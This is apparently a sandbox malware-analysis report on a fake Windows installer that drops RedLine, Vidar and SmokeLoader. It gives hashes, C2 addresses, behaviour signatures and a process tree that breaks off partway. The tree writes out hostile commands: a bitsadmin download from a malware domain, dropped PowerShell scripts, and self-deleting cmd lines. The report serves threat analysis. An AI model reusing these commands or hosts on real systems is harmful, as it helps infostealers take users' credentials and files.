Resubmissions

06-09-2021 14:13

210906-rjpvrsedbm 10

08-07-2021 11:08

210708-4gztl3mwl6 10

08-07-2021 08:02

210708-klfb4qeda6 10

07-07-2021 09:39

210707-nem57xyvf2 10

06-07-2021 17:51

210706-7pcrmjy3fa 10

06-07-2021 13:45

210706-eybelwcq86 10

05-07-2021 04:26

210705-z99jkt6lce 10

Analysis

  • max time kernel
    1800s
  • max time network
    1809s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    07-07-2021 09:39

General

  • Target

    setup_x86_x64_install - копия (3).exe

  • Size

    3.2MB

  • MD5

    3ae1c212119919e5fce71247286f8e0e

  • SHA1

    97c1890ab73c539056f95eafede319df774e9d38

  • SHA256

    30c2f230e5401b4b1ea8fb425dadf4e453575884303b9fa2066e6a91859f016e

  • SHA512

    5bb28a775c10b8b68b8c448d64287ca732d0af5577ecc4348a89934358440bb4ff6958115f14ecbabb0446d234d6f621afa3419daa4aec6c03c0af9b6a3b1558

Malware Config

Extracted

Family

redline

Botnet

ServAni

C2

87.251.71.195:82

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 61 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 28 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    1⤵
      PID:2572
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2820
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2800
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2748
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
          • Modifies registry class
          PID:2536
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1900
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1448
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Themes
              1⤵
                PID:1292
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1216
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1088
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:296
                    • C:\Users\Admin\AppData\Roaming\tecvebi
                      C:\Users\Admin\AppData\Roaming\tecvebi
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:4100
                    • C:\Users\Admin\AppData\Roaming\tecvebi
                      C:\Users\Admin\AppData\Roaming\tecvebi
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:6692
                    • C:\Users\Admin\AppData\Roaming\tecvebi
                      C:\Users\Admin\AppData\Roaming\tecvebi
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:6336
                    • C:\Windows\system32\rundll32.exe
                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll",QRIvBFx
                      2⤵
                      • Windows security modification
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:6784
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:352
                    • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (3).exe
                      "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (3).exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1032
                      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:3956
                        • C:\Users\Admin\AppData\Local\Temp\7zS47FF1FA4\setup_install.exe
                          "C:\Users\Admin\AppData\Local\Temp\7zS47FF1FA4\setup_install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:4048
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c arnatic_1.exe
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2876
                            • C:\Users\Admin\AppData\Local\Temp\7zS47FF1FA4\arnatic_1.exe
                              arnatic_1.exe
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2116
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS47FF1FA4\arnatic_1.exe" & del C:\ProgramData\*.dll & exit
                                6⤵
                                  PID:4216
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /im arnatic_1.exe /f
                                    7⤵
                                    • Kills process with taskkill
                                    PID:4044
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 6
                                    7⤵
                                    • Delays execution with timeout.exe
                                    PID:4260
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c arnatic_2.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:720
                              • C:\Users\Admin\AppData\Local\Temp\7zS47FF1FA4\arnatic_2.exe
                                arnatic_2.exe
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: MapViewOfSection
                                PID:1132
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c arnatic_3.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:816
                              • C:\Users\Admin\AppData\Local\Temp\7zS47FF1FA4\arnatic_3.exe
                                arnatic_3.exe
                                5⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                • Modifies registry class
                                • Suspicious use of WriteProcessMemory
                                PID:2452
                                • C:\Windows\SysWOW64\rUNdlL32.eXe
                                  "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                                  6⤵
                                  • Loads dropped DLL
                                  • Modifies registry class
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of WriteProcessMemory
                                  PID:2480
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c arnatic_4.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1456
                              • C:\Users\Admin\AppData\Local\Temp\7zS47FF1FA4\arnatic_4.exe
                                arnatic_4.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:3064
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  6⤵
                                  • Executes dropped EXE
                                  PID:3044
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:5012
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  6⤵
                                  • Executes dropped EXE
                                  PID:6860
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  6⤵
                                  • Executes dropped EXE
                                  PID:6820
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c arnatic_6.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1872
                              • C:\Users\Admin\AppData\Local\Temp\7zS47FF1FA4\arnatic_6.exe
                                arnatic_6.exe
                                5⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                PID:188
                                • C:\Users\Admin\Documents\lO2y0Cw7j30ANMGr9ngyQvEa.exe
                                  "C:\Users\Admin\Documents\lO2y0Cw7j30ANMGr9ngyQvEa.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  PID:1284
                                  • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                    "C:\Program Files (x86)\Company\NewProduct\file4.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4920
                                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:3036
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                      • Executes dropped EXE
                                      PID:5580
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                      • Executes dropped EXE
                                      PID:5924
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                      • Executes dropped EXE
                                      PID:6788
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                      • Executes dropped EXE
                                      PID:4624
                                  • C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
                                    "C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    • Modifies registry class
                                    PID:5044
                                    • C:\Windows\SysWOW64\rUNdlL32.eXe
                                      "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
                                      8⤵
                                      • Loads dropped DLL
                                      • Modifies registry class
                                      PID:5964
                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    • Drops file in Program Files directory
                                    PID:3500
                                • C:\Users\Admin\Documents\LG3tZ4erEheydbzHGie_9nWe.exe
                                  "C:\Users\Admin\Documents\LG3tZ4erEheydbzHGie_9nWe.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:3840
                                • C:\Users\Admin\Documents\xKnbYyaqfUVzF7TLa8nq2iA4.exe
                                  "C:\Users\Admin\Documents\xKnbYyaqfUVzF7TLa8nq2iA4.exe"
                                  6⤵
                                    PID:4944
                                    • C:\Users\Admin\Documents\xKnbYyaqfUVzF7TLa8nq2iA4.exe
                                      C:\Users\Admin\Documents\xKnbYyaqfUVzF7TLa8nq2iA4.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:4908
                                  • C:\Users\Admin\Documents\IG3uuGdpAVdW36bF_LpHCjxQ.exe
                                    "C:\Users\Admin\Documents\IG3uuGdpAVdW36bF_LpHCjxQ.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    PID:5104
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5104 -s 896
                                      7⤵
                                      • Program crash
                                      PID:808
                                  • C:\Users\Admin\Documents\UpNS6sDU97wNitHEd6S9zNY9.exe
                                    "C:\Users\Admin\Documents\UpNS6sDU97wNitHEd6S9zNY9.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:5016
                                    • C:\Users\Admin\Documents\UpNS6sDU97wNitHEd6S9zNY9.exe
                                      C:\Users\Admin\Documents\UpNS6sDU97wNitHEd6S9zNY9.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:4340
                                  • C:\Users\Admin\Documents\3XRqBK1wLXA5tcgazdbF6WAK.exe
                                    "C:\Users\Admin\Documents\3XRqBK1wLXA5tcgazdbF6WAK.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:5064
                                    • C:\Users\Admin\Documents\3XRqBK1wLXA5tcgazdbF6WAK.exe
                                      C:\Users\Admin\Documents\3XRqBK1wLXA5tcgazdbF6WAK.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:5088
                                  • C:\Users\Admin\Documents\wTosmV3dQxSqAKOuW4LCfSVZ.exe
                                    "C:\Users\Admin\Documents\wTosmV3dQxSqAKOuW4LCfSVZ.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:5056
                                    • C:\Users\Admin\Documents\wTosmV3dQxSqAKOuW4LCfSVZ.exe
                                      C:\Users\Admin\Documents\wTosmV3dQxSqAKOuW4LCfSVZ.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:1812
                                  • C:\Users\Admin\Documents\eGKixnCwVOr70LYu01Sx9Kko.exe
                                    "C:\Users\Admin\Documents\eGKixnCwVOr70LYu01Sx9Kko.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:5036
                                  • C:\Users\Admin\Documents\kUPf4UYrAI1b5WVckGPcu9xc.exe
                                    "C:\Users\Admin\Documents\kUPf4UYrAI1b5WVckGPcu9xc.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Checks BIOS information in registry
                                    • Checks whether UAC is enabled
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:4924
                                  • C:\Users\Admin\Documents\2wUE04jmfyCdABfhjZKm8IIe.exe
                                    "C:\Users\Admin\Documents\2wUE04jmfyCdABfhjZKm8IIe.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Checks BIOS information in registry
                                    • Checks whether UAC is enabled
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:4872
                                  • C:\Users\Admin\Documents\axxsTIfK9pE1cqgynNR3jTYI.exe
                                    "C:\Users\Admin\Documents\axxsTIfK9pE1cqgynNR3jTYI.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:4904
                                    • C:\Users\Admin\Documents\axxsTIfK9pE1cqgynNR3jTYI.exe
                                      C:\Users\Admin\Documents\axxsTIfK9pE1cqgynNR3jTYI.exe
                                      7⤵
                                      • Executes dropped EXE
                                      PID:2720
                                    • C:\Users\Admin\Documents\axxsTIfK9pE1cqgynNR3jTYI.exe
                                      C:\Users\Admin\Documents\axxsTIfK9pE1cqgynNR3jTYI.exe
                                      7⤵
                                        PID:1792
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 24
                                          8⤵
                                          • Program crash
                                          PID:1148
                                    • C:\Users\Admin\Documents\Bo8ybVJVGivOdtysXOHH4Dml.exe
                                      "C:\Users\Admin\Documents\Bo8ybVJVGivOdtysXOHH4Dml.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:4184
                                      • C:\Users\Admin\Documents\Bo8ybVJVGivOdtysXOHH4Dml.exe
                                        "C:\Users\Admin\Documents\Bo8ybVJVGivOdtysXOHH4Dml.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        PID:7064
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 708
                                        7⤵
                                        • Program crash
                                        PID:6976
                                    • C:\Users\Admin\Documents\BRh1DHi8IplmI5zbCnpncWKW.exe
                                      "C:\Users\Admin\Documents\BRh1DHi8IplmI5zbCnpncWKW.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:4652
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 680
                                        7⤵
                                        • Program crash
                                        PID:2268
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 696
                                        7⤵
                                        • Program crash
                                        PID:4584
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 232
                                        7⤵
                                        • Program crash
                                        PID:2332
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 656
                                        7⤵
                                        • Program crash
                                        PID:2972
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 1008
                                        7⤵
                                        • Program crash
                                        PID:5932
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 1124
                                        7⤵
                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                        • Program crash
                                        PID:6108
                                    • C:\Users\Admin\Documents\UQpoLrxSFIrRPinJCwPQPezf.exe
                                      "C:\Users\Admin\Documents\UQpoLrxSFIrRPinJCwPQPezf.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Drops file in Program Files directory
                                      PID:4336
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                        7⤵
                                          PID:3148
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                          7⤵
                                            PID:6888
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                            7⤵
                                              PID:4156
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                              7⤵
                                                PID:7032
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:5816
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:4504
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                                    7⤵
                                                    • Checks for any installed AV software in registry
                                                    PID:6168
                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                    "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
                                                    7⤵
                                                    • Download via BitsAdmin
                                                    PID:6548
                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Drops file in Program Files directory
                                                    PID:4412
                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5416
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:5808
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:3688
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:3864
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:6668
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:4216
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
                                                              7⤵
                                                              • Loads dropped DLL
                                                              PID:2864
                                                              • C:\Windows\system32\rundll32.exe
                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
                                                                8⤵
                                                                • Loads dropped DLL
                                                                • Drops file in System32 directory
                                                                PID:6828
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                                              7⤵
                                                              • Drops file in Program Files directory
                                                              PID:5372
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                                              7⤵
                                                              • Drops file in Program Files directory
                                                              PID:5380
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:5980
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  8⤵
                                                                    PID:4568
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:1360
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFEA6.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:5384
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        8⤵
                                                                          PID:6520
                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:4876
                                                                    • C:\Users\Admin\Documents\HNg3um24DkZGo_nsWN3q12Aa.exe
                                                                      "C:\Users\Admin\Documents\HNg3um24DkZGo_nsWN3q12Aa.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Checks BIOS information in registry
                                                                      • Checks whether UAC is enabled
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:4308
                                                                    • C:\Users\Admin\Documents\llMAss5OWgm7QNV4zp6CYQT1.exe
                                                                      "C:\Users\Admin\Documents\llMAss5OWgm7QNV4zp6CYQT1.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Checks processor information in registry
                                                                      PID:4948
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im llMAss5OWgm7QNV4zp6CYQT1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\llMAss5OWgm7QNV4zp6CYQT1.exe" & del C:\ProgramData\*.dll & exit
                                                                        7⤵
                                                                          PID:5136
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /im llMAss5OWgm7QNV4zp6CYQT1.exe /f
                                                                            8⤵
                                                                            • Kills process with taskkill
                                                                            PID:5696
                                                                          • C:\Windows\SysWOW64\timeout.exe
